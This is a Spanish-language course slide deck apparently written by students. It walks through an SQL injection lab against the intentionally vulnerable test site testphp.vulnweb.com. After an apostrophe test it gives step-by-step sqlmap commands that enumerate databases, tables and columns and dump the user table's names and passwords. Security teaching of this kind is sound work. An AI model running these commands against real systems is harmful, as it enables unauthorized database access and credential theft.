1. Universidad Nacional Abierta y a Distancia
(UNAD)
SEGURIDAD EN BASES DE DATOS
Ataque con inyección de código SQL a sitio web
Grupo 233009_17
2. INTRODUCCIÓN
• Un sistema de protección deberá tener la flexibilidad suficiente para poder
imponer una diversidad de políticas y mecanismos.
• Los ataques a las páginas web y las bases de datos son un tema critico de
filtrado de información para cada organización, por ello debemos conocer
cómo se realizan y su fin para así proteger y salvaguardar la información.
3. OBJETIVOS
• Realizar ataque por inyección de código SQL a un sitio Web.
• Identificar los posibles ataques a los cuales se puede exponer un sistema de
información.
• Conocer técnicas para detectar los posibles ataques a los sistemas de
información
4. DESARROLLO DE LA ACTIVIDAD
Realizar un ataque a la base de datos del sitio http://testphp.vulnweb.com ,
con lo cual se debe obtener toda la información sobre la base de datos por
ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las
tablas, información de las tablas, información de las columnas, etc.
5. Lo primero que debemos es definir de qué modo se realizará el
ataque, ya sea por sistema operativo Linux o por Microsoft.
Para este caso se realizará con Microsoft.
Luego de definir el sistema para el ataque se procede a descargar un
programa para realizar ataque por inyección de código SQL se sugiere
SQLMAP ( http://sqlmap.org/) o Nmap (http://nmap.org/download.html) y el
programa Pyntos
6. Una vez descargados se necesita que la carpeta comprimida de sqlmap sea
instalada en el mismo lado o unidad como se observa en la imagen.
7. Ahora validamos que la pagina suministrada sea vulnerable a ataques, esto se hace agregando
el apostrofo ‘ al final de url.
Url a validar: http://testphp.vulnweb.com
8. Una vez analizada y verificado el posible ataque a realizar, procedemos a
ubicarnos en por línea de comandos en la carpeta sqlmap con el comando
cd .., de la siguiente manera:
9. Y una vez ubicados en la carpeta sqlmap,
comenzamos con la ejecución de comando.
Ejecución de comando para averiguar nombre de la base de datos:
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –dbs
10. Ejecución de comando: sqlmap.py -u
http://testphp.vulnweb.com/listproducts.php?cat=2 --current-db ;para extraer
información de la base de datos
11. Comando para extraer el nombre de las tablas de la base de datos: sqlmap.py -u
http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --tables
12. Comando para extraer las columnas de la base de datos: sqlmap.py -u
http://testphp.vulnweb.com/listproducts.php?cat=2 –T user --columns
13. Comando para extraer datos de las columnas de la base de datos: sqlmap.py -u
http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C name –dump
14. Comando para validar password: sqlmap.py -u
http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C pass –dump